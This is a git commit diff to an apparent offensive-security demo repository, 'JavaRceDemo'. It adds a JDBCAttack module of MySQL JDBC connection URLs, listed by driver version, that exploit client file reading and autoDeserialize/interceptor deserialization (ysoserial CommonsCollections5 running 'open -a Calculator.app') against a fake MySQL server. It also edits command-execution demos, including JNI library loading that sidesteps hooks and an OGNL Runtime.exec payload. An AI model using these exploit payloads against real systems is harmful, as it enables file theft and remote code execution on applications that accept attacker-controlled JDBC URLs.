add JDBC Attack mysql :)

Whoopsunix · Whoopsunix · commit d948629ba54f · 2023-08-31T20:33:53.000+08:00
diff --git a/Command/pom.xml b/Command/pom.xml
@@ -35,11 +35,9 @@
             <artifactId>guava</artifactId>
             <version>23.0</version>
         </dependency>
+    </dependencies>
 
 
-
-
-    </dependencies>
     <build>
         <plugins>
             <plugin>
diff --git a/Command/src/main/java/org/command/exec/RuntimeDemo.java b/Command/src/main/java/org/command/exec/RuntimeDemo.java
@@ -26,9 +26,9 @@ public static InputStream exec(String str) throws Exception {
     public static void main(String[] args) throws Exception {
         InputStream inputStream = exec("ifconfig -a");
         ExecResultGet execResultGet = new ExecResultGet();
-        System.out.println(execResultGet.stringBuilder(inputStream));
+//        System.out.println(execResultGet.stringBuilder(inputStream));
 //        System.out.println(execResultGet.byteArrayOutputStream(inputStream));
-//        System.out.println(execResultGet.scanner(inputStream));
+        System.out.println(execResultGet.scanner(inputStream));
 //        System.out.println(execResultGet.bufferedReader(inputStream));
 //        System.out.println(execResultGet.bufferedReader2(inputStream));
 //        System.out.println(execResultGet.readNBytes(inputStream));
diff --git a/Command/src/main/java/org/command/exec/ScriptEngineManagerDemo.java b/Command/src/main/java/org/command/exec/ScriptEngineManagerDemo.java
@@ -1,7 +1,5 @@
 package org.command.exec;
 
-import org.command.resultGet.ExecResultGet;
-
 import javax.script.ScriptEngine;
 import javax.script.ScriptEngineManager;
 import java.io.InputStream;
diff --git a/Command/src/main/java/org/command/exec/jni/JniCmdDemo.java b/Command/src/main/java/org/command/exec/jni/JniCmdDemo.java
@@ -42,15 +42,16 @@ protected Class<?> findClass(String name) throws ClassNotFoundException {
             /**
              * 替换lib路径
              */
-            File libPath = new File("/Users/ppp/Documents/pppRepository/github_file/JavaRceDemo/Command/src/main/java/org/command/exec/jni/com/command/exec/jni/libcmd.jnilib");
+            // 获取项目目录
+            File libPath = new File(System.getProperty("user.dir") + "/Command/src/main/java/org/command/exec/jni/com/command/exec/jni/libcmd.jnilib");
 
             /**
              * load命令执行类
              */
             Class<?> commandClass = loader.loadClass(COMMAND_CLASS_NAME);
 
             // 可以用System.load也加载lib也可以用反射ClassLoader加载,如果loadLibrary0被拦截了可以换java.lang.ClassLoader$NativeLibrary类的load方法
-//            System.load("/Users/ppp/Documents/dev/PPPVULNS/Myana/vulSpringboot/src/main/java/com/whoopsunix/vul/exec/jni/com/whoopsunix/vul/exec/jni/libcmd.jnilib");
+//            System.load(libPath.getAbsolutePath());
             Method loadLibrary0Method = ClassLoader.class.getDeclaredMethod("loadLibrary0", Class.class, File.class);
             loadLibrary0Method.setAccessible(true);
             loadLibrary0Method.invoke(loader, commandClass, libPath);
diff --git a/Command/src/main/java/org/command/resultGet/ExecResultGet.java b/Command/src/main/java/org/command/resultGet/ExecResultGet.java
@@ -3,7 +3,10 @@
 
 import com.google.common.io.CharStreams;
 
-import java.io.*;
+import java.io.BufferedReader;
+import java.io.ByteArrayOutputStream;
+import java.io.InputStream;
+import java.io.InputStreamReader;
 import java.util.Scanner;
 import java.util.stream.Collectors;
 
diff --git a/Expression/pom.xml b/Expression/pom.xml
@@ -35,6 +35,22 @@
             <version>4.3.16.RELEASE</version>
         </dependency>
 
+        <!-- EL -->
+        <dependency>
+            <groupId>javax.servlet</groupId>
+            <artifactId>servlet-api</artifactId>
+            <version>2.5</version>
+        </dependency>
+        <!-- 考虑到实际使用更多的是引用的 servlet-api ，避免漏掉可能的调用-->
+<!--        &lt;!&ndash; https://mvnrepository.com/artifact/org.apache.tomcat/tomcat-el-api &ndash;&gt;-->
+<!--        <dependency>-->
+<!--            <groupId>org.apache.tomcat</groupId>-->
+<!--            <artifactId>tomcat-el-api</artifactId>-->
+<!--            <version>8.5.82</version>-->
+<!--        </dependency>-->
+
+
+
         <!-- Inputstream -->
         <dependency>
             <groupId>org.springframework</groupId>
@@ -55,6 +71,8 @@
         </dependency>
 
 
+
+
     </dependencies>
 
     <build>
diff --git a/Expression/src/main/java/org/expression/OGNL.java b/Expression/src/main/java/org/expression/OGNL.java
@@ -3,8 +3,6 @@
 import ognl.Ognl;
 import ognl.OgnlContext;
 
-import java.io.BufferedInputStream;
-
 /**
  * @author Whoopsunix
  */
@@ -55,10 +53,6 @@ public static void main(String[] args) {
 //        // 用 IOUtils 实现
 //        String base64EncodeIOUtils = "(#str=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('ifconfig').getInputStream(),'UTF-8')).(#base64=@java.util.Base64@getEncoder().encodeToString(#str.getBytes()))";
 
-
-
-
-
     }
 
     /**
diff --git a/JDBCAttack/pom.xml b/JDBCAttack/pom.xml
@@ -0,0 +1,50 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+
+    <groupId>org.example</groupId>
+    <artifactId>JDBCAttack</artifactId>
+    <version>1.0-SNAPSHOT</version>
+    <packaging>jar</packaging>
+
+    <name>JDBCAttack</name>
+
+    <properties>
+        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
+    </properties>
+
+  <dependencies>
+    <dependency>
+      <groupId>mysql</groupId>
+      <artifactId>mysql-connector-java</artifactId>
+<!--        <version>3.1.11</version>-->
+<!--        <version>5.1.19</version>-->
+<!--      <version>6.0.6</version>-->
+            <version>8.0.19</version>
+    </dependency>
+
+    <dependency>
+      <groupId>commons-collections</groupId>
+      <artifactId>commons-collections</artifactId>
+      <version>3.2.1</version>
+    </dependency>
+  </dependencies>
+
+  <build>
+    <plugins>
+      <plugin>
+        <groupId>org.springframework.boot</groupId>
+        <artifactId>spring-boot-maven-plugin</artifactId>
+      </plugin>
+      <plugin>
+        <groupId>org.apache.maven.plugins</groupId>
+        <artifactId>maven-compiler-plugin</artifactId>
+        <version>3.8.1</version>
+        <configuration>
+          <source>1.8</source>
+          <target>1.8</target>
+        </configuration>
+      </plugin>
+    </plugins>
+  </build>
+</project>
diff --git a/JDBCAttack/src/main/java/org/example/mysql/FileAttack.java b/JDBCAttack/src/main/java/org/example/mysql/FileAttack.java
@@ -0,0 +1,44 @@
+package org.example.mysql;
+
+import java.sql.Connection;
+import java.sql.DriverManager;
+
+/**
+ * 文件读取
+ * mysql https://mvnrepository.com/artifact/mysql/mysql-connector-java
+ * 复现使用 https://github.com/fnmsd/MySQL_Fake_Server
+ *
+ * @author Whoopsunix
+ */
+public class FileAttack {
+    public static void main(String[] args) throws Exception {
+        /**
+         * [3.1.11, 3.1.14]
+         */
+        String fileReadAttackUrl_3 = "jdbc:mysql://127.0.0.1:3306/test?maxAllowedPacket=655360&user=fileread_/tmp/flag.txt";
+
+        /**
+         * [5.0.2, 5.1.48]
+         */
+        String fileReadAttackUrl_5 = "jdbc:mysql://127.0.0.1:3306/test?maxAllowedPacket=655360&user=fileread_/tmp/flag.txt";
+
+        /**
+         * [6.0.2, 6.0.6]
+         */
+        String fileReadAttackUrl_6 = "jdbc:mysql://127.0.0.1:3306/test?maxAllowedPacket=655360&user=fileread_/tmp/flag.txt";
+
+        /**
+         * [8.0.7-dmr,8.0.23]
+         */
+        String fileReadAttackUrl_8_7_23 = "jdbc:mysql://127.0.0.1:3306/test?&allowLoadLocalInfile=true&user=fileread_/tmp/flag.txt";
+
+        // 低版本需要加载
+        String driver = "com.mysql.jdbc.Driver";
+        Class.forName(driver);
+
+        String test = "jdbc:mysql://127.0.0.1:3306/test?&allowLoadLocalInfile=true&user=fileread_/tmp/flag.txt";
+
+        Connection connection = DriverManager.getConnection(fileReadAttackUrl_8_7_23);
+    }
+
+}
diff --git a/JDBCAttack/src/main/java/org/example/mysql/SerializeAttack.java b/JDBCAttack/src/main/java/org/example/mysql/SerializeAttack.java
@@ -0,0 +1,55 @@
+package org.example.mysql;
+
+import java.sql.Connection;
+import java.sql.DriverManager;
+
+/**
+ * 反序列化
+ * mysql https://mvnrepository.com/artifact/mysql/mysql-connector-java
+ * 复现使用 https://github.com/fnmsd/MySQL_Fake_Server
+ *
+ * @author Whoopsunix
+ */
+public class SerializeAttack {
+    public static void main(String[] args) throws Exception {
+        /**
+         * [5.1.11, 5.1.48]
+         * 使用 statementInterceptors 参数
+         */
+        String serializeAttackUrl_5_11_48 = "jdbc:mysql://127.0.0.1:3306/test?maxAllowedPacket=655360&autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections5_open -a Calculator.app";
+
+        /**
+         * [5.1.19, 5.1.28]
+         */
+        String serializeAttackUrl_5_19_28 = "jdbc:mysql://127.0.0.1:3306/test?maxAllowedPacket=655360&autoDeserialize=true&user=yso_CommonsCollections5_open -a Calculator.app";
+
+        /**
+         * [5.1.29, 5.1.40]
+         * detectCustomCollations 触发
+         */
+        String serializeAttackUrl_5_29_40 = "jdbc:mysql://127.0.0.1:3306/test?maxAllowedPacket=655360&detectCustomCollations=true&autoDeserialize=true&user=yso_CommonsCollections5_open -a Calculator.app";
+
+        /**
+         * [6.0.2, 6.0.6]
+         * statementInterceptors
+         */
+        String serializeAttackUrl_6 = "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections5_open -a Calculator.app";
+
+        /**
+         * [8.0.7-dmr,8.0.19]
+         * statementInterceptors
+         */
+        String serializeAttackUrl_8_7_19 = "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections5_open -a Calculator.app";
+
+
+        // 低版本需要加载
+//        String driver = "com.mysql.jdbc.Driver";
+//        Class.forName(driver);
+
+
+        Connection connection = DriverManager.getConnection(serializeAttackUrl_8_7_19);
+
+
+    }
+
+}
diff --git a/pom.xml b/pom.xml
@@ -1,43 +1,43 @@
 <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-  xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
-  <modelVersion>4.0.0</modelVersion>
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+    <modelVersion>4.0.0</modelVersion>
 
-  <groupId>org.example</groupId>
-  <artifactId>JavaRceDemo</artifactId>
-  <version>1.0-SNAPSHOT</version>
-  <packaging>pom</packaging>
+    <groupId>org.example</groupId>
+    <artifactId>JavaRceDemo</artifactId>
+    <version>1.0-SNAPSHOT</version>
+    <packaging>pom</packaging>
 
-  <name>JavaRceDemo</name>
-  <modules>
-    <module>Command</module>
-    <module>MemShell</module>
-    <module>Expression</module>
-    <module>JDBC</module>
-    <module>Utils</module>
-    <module>RceEcho</module>
+    <name>JavaRceDemo</name>
+    <modules>
+        <module>Command</module>
+        <module>MemShell</module>
+        <module>Expression</module>
+        <module>JDBCAttack</module>
+        <module>Utils</module>
+        <module>RceEcho</module>
 
-  </modules>
+    </modules>
 
-  <properties>
-    <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
-  </properties>
+    <properties>
+        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
+    </properties>
 
 
-  <build>
-    <plugins>
-      <plugin>
-        <groupId>org.springframework.boot</groupId>
-        <artifactId>spring-boot-maven-plugin</artifactId>
-      </plugin>
-      <plugin>
-        <groupId>org.apache.maven.plugins</groupId>
-        <artifactId>maven-compiler-plugin</artifactId>
-        <version>3.8.1</version>
-        <configuration>
-          <source>1.8</source>
-          <target>1.8</target>
-        </configuration>
-      </plugin>
-    </plugins>
-  </build>
+    <build>
+        <plugins>
+            <plugin>
+                <groupId>org.springframework.boot</groupId>
+                <artifactId>spring-boot-maven-plugin</artifactId>
+            </plugin>
+            <plugin>
+                <groupId>org.apache.maven.plugins</groupId>
+                <artifactId>maven-compiler-plugin</artifactId>
+                <version>3.8.1</version>
+                <configuration>
+                    <source>1.8</source>
+                    <target>1.8</target>
+                </configuration>
+            </plugin>
+        </plugins>
+    </build>
 </project>
